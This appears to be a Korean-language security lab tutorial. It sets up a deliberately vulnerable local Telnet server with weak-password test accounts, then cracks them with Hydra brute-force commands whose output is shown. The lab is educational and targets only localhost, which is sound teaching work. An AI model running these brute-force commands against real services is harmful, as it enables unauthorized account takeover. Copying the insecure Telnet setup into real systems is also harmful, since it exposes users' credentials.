이 랩에서는 다재다능한 비밀번호 크래킹 도구인 Hydra 를 사용하여 Telnet 서비스에 대한 무차별 대입 공격을 수행하는 방법을 배우게 됩니다. 취약한 Telnet 환경을 설정하고 Hydra 를 사용하여 약한 자격 증명이 어떻게 악용될 수 있는지 시연할 것입니다.
이 랩에서는 Telnet 서버 구성, 테스트 자격 증명 생성, 보안 위험을 강조하기 위한 Hydra 공격 실행을 다룹니다. 실습을 통해 Telnet 이 왜 안전하지 않은지 이해하고 암호화된 대안을 사용하는 것이 얼마나 중요한지 배우게 됩니다.
이 단계에서는 로컬 테스트 환경을 만들기 위해 LabEx VM 에 Telnet 서버를 설치합니다. Telnet 은 가장 오래된 네트워크 프로토콜 중 하나로, 시스템에 대한 원격 액세스를 허용합니다. 그러나 모든 데이터 (비밀번호 포함) 를 암호화 없이 일반 텍스트로 전송하므로 실제 사용에는 매우 안전하지 않지만 보안 테스트 개념을 배우는 데는 완벽합니다.
sudo apt update-y 플래그는 설치 중 모든 프롬프트를 자동으로 확인합니다.sudo apt install -y xinetd telnetd/etc/xinetd.d/telnet에 Telnet 구성 파일을 생성합니다. 대부분의 Linux 시스템에 포함된 간단한 텍스트 편집기인 nano 를 사용합니다.sudo nano /etc/xinetd.d/telnetdisable = no 줄은 특히 서비스 활성화에 중요합니다.service telnet
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/sbin/in.telnetd
log_on_failure += USERID
}sudo service xinetd restartnetstat 명령은 활성 네트워크 연결 및 수신 포트를 표시합니다.sudo netstat -tulnp
다음과 유사한 출력이 표시되어야 하며, 이는 Telnet 서비스가 포트 23 에서 수신 대기 중임을 나타냅니다.
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 22/sshd: /usr/sbin/
tcp 0 0 0.0.0.0:3001 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3002 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.11:38203 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN 22/sshd: /usr/sbin/
tcp6 0 0 :::23 :::* LISTEN 1620/xinetd
udp 0 0 0.0.0.0:3001 0.0.0.0:* -
udp 0 0 127.0.0.11:54421 0.0.0.0:* -이 단계에서는 Hydra 무차별 대입 공격 시연에 사용될 테스트 계정을 생성합니다. 이러한 계정은 실제 시스템에서 발견되는 일반적인 약한 자격 증명을 나타내며, 공격자가 열악한 비밀번호 관행을 어떻게 악용하는지 안전하게 시연할 수 있도록 합니다.
useradd 명령을 사용하여 세 개의 테스트 사용자 계정을 생성합니다. -m 플래그는 각 사용자에 대한 홈 디렉토리가 생성되도록 합니다.sudo useradd -m user1
sudo useradd -m user2
sudo useradd -m user3chpasswd 명령은 대화형 프롬프트 없이 안전하게 비밀번호를 변경합니다.echo "user1:password" | sudo chpasswd
echo "user2:123456" | sudo chpasswd
echo "user3:qwerty" | sudo chpasswdgrep 명령은 모든 사용자 계정 정보를 저장하는 /etc/passwd에서 테스트 사용자를 필터링합니다.grep -E 'user1|user2|user3' /etc/passwd다음과 유사한 출력이 표시되어야 합니다.
user1:x:5001:5001::/home/user1:/bin/sh
user2:x:5002:5003::/home/user2:/bin/sh
user3:x:5003:5004::/home/user3:/bin/shcd ~/project
echo -e "user1\nuser2\nuser3" > usernames.txt
echo -e "password\n123456\nqwerty" > passwords.txtcat 명령은 파일 내용을 표시합니다. Hydra 의 요구 사항에 맞는 형식을 보장하기 위해 두 파일을 모두 확인합니다.cat usernames.txt && cat passwords.txt다음과 같은 내용이 표시되어야 합니다.
user1
user2
user3
password
123456
qwerty이 단계에서는 Hydra 가 무차별 대입 공격에 사용할 자격 증명 파일을 준비합니다. 이러한 파일에는 이전 단계에서 생성한 사용자 이름과 비밀번호가 포함되어 있습니다. 무차별 대입 공격은 올바른 자격 증명이 발견될 때까지 가능한 모든 자격 증명 조합을 체계적으로 시도하여 작동합니다. 잘 정리된 자격 증명 파일을 사용하면 이 프로세스를 더욱 효율적으로 만들 수 있습니다.
cd ~/project
ls -l usernames.txt passwords.txt다음과 유사한 출력이 표시되어야 합니다.
-rw-r--r-- 1 labex labex 12 May 1 10:00 passwords.txt
-rw-r--r-- 1 labex labex 12 May 1 10:00 usernames.txtecho "Usernames:" && cat usernames.txt
echo "Passwords:" && cat passwords.txt예상 출력:
Usernames:
user1
user2
user3
Passwords:
password
123456
qwertypaste usernames.txt passwords.txt > credentials.txt
cat credentials.txt다음과 같은 내용이 표시됩니다.
user1 password
user2 123456
user3 qwertysudo apt install -y hydra hydra-gtkhydra -h | head -n 5Hydra 의 도움말 출력은 다음으로 시작해야 합니다.
Hydra v9.2 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]이 단계에서는 이전에 준비한 자격 증명 파일을 사용하여 로컬 Telnet 서버에 대한 무차별 대입 공격을 수행하기 위해 Hydra 를 사용합니다. Hydra 는 Telnet 을 포함한 여러 프로토콜을 지원하는 널리 사용되는 비밀번호 크래킹 도구입니다. 이 공격은 파일에서 모든 사용자 이름/비밀번호 조합을 체계적으로 시도합니다.
cd ~/projecthydra -L usernames.txt -P passwords.txt telnet://127.0.0.1[DATA] attacking telnet://127.0.0.1:23/
[23][telnet] host: 127.0.0.1 login: user3 password: qwerty
[23][telnet] host: 127.0.0.1 login: user2 password: 123456
[23][telnet] host: 127.0.0.1 login: user1 password: password
1 of 1 target successfully completed, 3 valid passwords found
hydra -L usernames.txt -P passwords.txt telnet://127.0.0.1 -o hydra_results.txtcat hydra_results.txt성공적인 로그인 시도를 보여주는 샘플 출력:
[23][telnet] host: 127.0.0.1 login: user3 password: qwerty
[23][telnet] host: 127.0.0.1 login: user2 password: 123456
[23][telnet] host: 127.0.0.1 login: user1 password: passwordhydra -vV -L usernames.txt -P passwords.txt telnet://127.0.0.1자세한 출력은 다음과 같이 표시되어 실패 및 성공 시도를 모두 보여줍니다.
[VERBOSE] Attempting user1:password... [SUCCESS]이 단계에서는 Telnet 서비스에 대한 Hydra 무차별 대입 공격의 결과를 분석하여 어떤 자격 증명이 손상되었는지 이해합니다. Hydra 는 서비스에 대해 여러 사용자 이름/비밀번호 조합을 테스트하며, 출력 파일에는 실패한 시도와 함께 모든 성공적인 로그인이 포함되어 있습니다.
cd ~/project
cat hydra_results.txt샘플 출력은 성공적인 로그인 형식을 보여줍니다. 각 줄에는 프로토콜 (telnet), 대상 IP 주소 및 크래킹된 자격 증명이 포함되어 있습니다.
[23][telnet] host: 127.0.0.1 login: user1 password: password
[23][telnet] host: 127.0.0.1 login: user2 password: 123456grep "login:" hydra_results.txttelnet 127.0.0.1로그인 프롬프트에서 다음을 입력합니다.
user1
password성공적인 로그인은 서버 환영 메시지와 명령 프롬프트를 표시합니다.
Welcome to LabEx Telnet Server
user1@localhost:~$테스트를 마쳤으면 exit를 입력하여 Telnet 세션을 종료합니다.
echo "Compromised Accounts:" > attack_summary.txt
grep "login:" hydra_results.txt >> attack_summary.txt
echo -e "\nTotal compromised: $(grep -c "login:" hydra_results.txt)" >> attack_summary.txt
cat attack_summary.txt이 랩에서는 xinetd 와 취약한 자격 증명을 사용하여 보안 테스트 목적으로 취약한 Telnet 서버 환경을 설정하는 방법을 배웠습니다. 이 프로세스에는 포트 23 에서 Telnet 서비스를 구성하고 인증 취약성을 시연하기 위해 의도적으로 약한 비밀번호를 가진 테스트 계정을 만드는 작업이 포함되었습니다.
이 연습은 Telnet 과 같은 암호화되지 않은 프로토콜을 사용할 때의 보안 위험과 강력한 비밀번호 정책을 구현하는 것의 중요성을 강조했습니다. Hydra 를 사용한 실질적인 시연을 통해 약한 인증 메커니즘을 가진 시스템이 무차별 대입 공격에 의해 얼마나 쉽게 손상될 수 있는지 관찰했습니다.
